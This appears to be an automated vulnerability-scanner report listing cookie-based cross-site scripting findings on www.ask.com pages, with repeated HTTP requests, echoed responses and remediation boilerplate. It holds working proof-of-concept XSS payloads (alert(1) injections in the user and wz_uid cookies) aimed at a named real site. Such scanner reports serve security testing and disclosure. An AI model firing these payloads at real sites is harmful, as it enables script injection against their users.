GET / HTTP/1.1 Host: www.ask.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA4f7e1'-alert(1)-'b912a2891cb; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de ...[SNIP]... <iframe/>');el.attr('src','http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_h504;u1=0C41C9EC70F2B3A933ADE477A41477DA4f7e1'-alert(1)-'b912a2891cb;u4=;u3=;u2=0;ord=-556541467?').attr('width','1').attr('height','1').attr('frameborder','0');$j('body').append(el);});JASK.namespace("hp.dialogs");$j(document).ready(function() {$j.each(JASK.hp.dialogs ...[SNIP]...
The value of the user cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e19b3'-alert(1)-'4d5b7994e21 was submitted in the user cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about HTTP/1.1 Host: www.ask.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dire19b3'-alert(1)-'4d5b7994e21; __utmb=252994457.2.10.1290271572;
The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d0a4'-alert(1)-'33276c18830 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ans?qsrc=&o=0&l=dir5fb41 HTTP/1.1 Host: www.ask.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAzOjI1LVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28document.cookies%29%2F%2Fd1f92dec88a; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|1; qc=0; cu.wz=0; gcht=; wz_sid=0B45CFE073F3F30B5FA9E877A6187EDA; wz_uid=074DCFE874F3F30B5FA9E877A6187EDA7d0a4'-alert(1)-'33276c18830; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user="o=0&l=dir5fb41'; __utmb=252994457.2.10.1290271572;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de ...[SNIP]... <iframe/>');el.attr('src','http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=074DCFE874F3F30B5FA9E877A6187EDA7d0a4'-alert(1)-'33276c18830;u4=;u3=;u2=0;ord=-349459782?').attr('width','1').attr('height','1').attr('frameborder','0');$j('body').append(el);});JASK.namespace("hp.dialogs");$j(document).ready(function() {$j.each(JASK.hp.dialogs ...[SNIP]...
The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54944'-alert(1)-'b88ed0e9dd4 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogsearch?qsrc=0&o=0&l=dir5fb41 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAzOjI1LVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28document.cookies%29%2F%2Fd1f92dec88a; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|1; qc=0; cu.wz=0; gcht=; wz_sid=0B45CFE073F3F30B5FA9E877A6187EDA; wz_uid=074DCFE874F3F30B5FA9E877A6187EDA54944'-alert(1)-'b88ed0e9dd4; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user="o=0&l=dir5fb41'; __utmb=252994457.2.10.1290271572;
Response
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de ...[SNIP]... <iframe/>');el.attr('src','http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=074DCFE874F3F30B5FA9E877A6187EDA54944'-alert(1)-'b88ed0e9dd4;u4=;u3=;u2=0;ord=-283002203?').attr('width','1').attr('height','1').attr('frameborder','0');$j('body').append(el);});JASK.namespace("hp.dialogs");$j(document).ready(function() {$j.each(JASK.hp.dialogs ...[SNIP]...
The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 203e3'-alert(1)-'327530facef was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /homepage HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA203e3'-alert(1)-'327530facef; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;
Response
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de ...[SNIP]... <iframe/>');el.attr('src','http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_h504;u1=0C41C9EC70F2B3A933ADE477A41477DA203e3'-alert(1)-'327530facef;u4=;u3=;u2=0;ord=-1313429672?').attr('width','1').attr('height','1').attr('frameborder','0');$j('body').append(el);});JASK.namespace("hp.dialogs");$j(document).ready(function() {$j.each(JASK.hp.dialog ...[SNIP]...
The value of the user cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef5aa'-alert(1)-'3edbb990812 was submitted in the user cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pictureslanding HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=diref5aa'-alert(1)-'3edbb990812; __utmb=252994457.2.10.1290271572;
The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64b88'-alert(1)-'a597c89dd3c was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pictureslanding%3Fo%3D0%26l%3Ddir5fb41%27%253Balert(1 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAzOjI1LVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28document.cookies%29%2F%2Fd1f92dec88a; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|1; qc=0; cu.wz=0; gcht=; wz_sid=0B45CFE073F3F30B5FA9E877A6187EDA; wz_uid=074DCFE874F3F30B5FA9E877A6187EDA64b88'-alert(1)-'a597c89dd3c; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user="o=0&l=dir5fb41'; __utmb=252994457.2.10.1290271572;
Response
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de ...[SNIP]... <iframe/>');el.attr('src','http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=074DCFE874F3F30B5FA9E877A6187EDA64b88'-alert(1)-'a597c89dd3c;u4=;u3=;u2=0;ord=-51669521?').attr('width','1').attr('height','1').attr('frameborder','0');$j('body').append(el);});JASK.namespace("hp.dialogs");$j(document).ready(function() {$j.each(JASK.hp.dialogs, ...[SNIP]...
The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8dabc'-alert(1)-'59d45fee295 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pictureslanding%3Fo%3D0%26l%3Ddir5fb41%27%3Balert(DOCUMENT.COOKIES HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAzOjI1LVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28document.cookies%29%2F%2Fd1f92dec88a; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|1; qc=0; cu.wz=0; gcht=; wz_sid=0B45CFE073F3F30B5FA9E877A6187EDA; wz_uid=074DCFE874F3F30B5FA9E877A6187EDA8dabc'-alert(1)-'59d45fee295; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user="o=0&l=dir5fb41'; __utmb=252994457.2.10.1290271572;
Response
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de ...[SNIP]... <iframe/>');el.attr('src','http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=074DCFE874F3F30B5FA9E877A6187EDA8dabc'-alert(1)-'59d45fee295;u4=;u3=;u2=0;ord=-1137438782?').attr('width','1').attr('height','1').attr('frameborder','0');$j('body').append(el);});JASK.namespace("hp.dialogs");$j(document).ready(function() {$j.each(JASK.hp.dialog ...[SNIP]...
The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa397'-alert(1)-'4521f1aa434 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video?qsrc=0&o=0&l=dir5fb41 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAzOjI1LVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28document.cookies%29%2F%2Fd1f92dec88a; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|1; qc=0; cu.wz=0; gcht=; wz_sid=0B45CFE073F3F30B5FA9E877A6187EDA; wz_uid=074DCFE874F3F30B5FA9E877A6187EDAaa397'-alert(1)-'4521f1aa434; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user="o=0&l=dir5fb41'; __utmb=252994457.2.10.1290271572;
Response
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de ...[SNIP]... <iframe/>');el.attr('src','http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=074DCFE874F3F30B5FA9E877A6187EDAaa397'-alert(1)-'4521f1aa434;u4=;u3=;u2=0;ord=-844384763?').attr('width','1').attr('height','1').attr('frameborder','0');$j('body').append(el);});JASK.namespace("hp.dialogs");$j(document).ready(function() {$j.each(JASK.hp.dialogs ...[SNIP]...
The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1db9e'-alert(1)-'dc71632913f was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /web HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA1db9e'-alert(1)-'dc71632913f; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;
Response
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de ...[SNIP]... <iframe/>');el.attr('src','http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_h504;u1=0C41C9EC70F2B3A933ADE477A41477DA1db9e'-alert(1)-'dc71632913f;u4=;u3=;u2=0;ord=-1145871071?').attr('width','1').attr('height','1').attr('frameborder','0');$j('body').append(el);});JASK.namespace("hp.dialogs");$j(document).ready(function() {$j.each(JASK.hp.dialog ...[SNIP]...
The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7eb3c'-alert(1)-'ee3526f5f97 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /web?q=What+causes+brain+freeze%3F&gc=1&qsrc=3045&o=0&l=dir HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA7eb3c'-alert(1)-'ee3526f5f97; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;
The value of the wz_uid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec63a"><script>alert(1)</script>7e00dc9945 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /web?q=What+causes+brain+freeze%3F&gc=1&qsrc=3045&o=0&l=dir HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=ec63a"><script>alert(1)</script>7e00dc9945; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;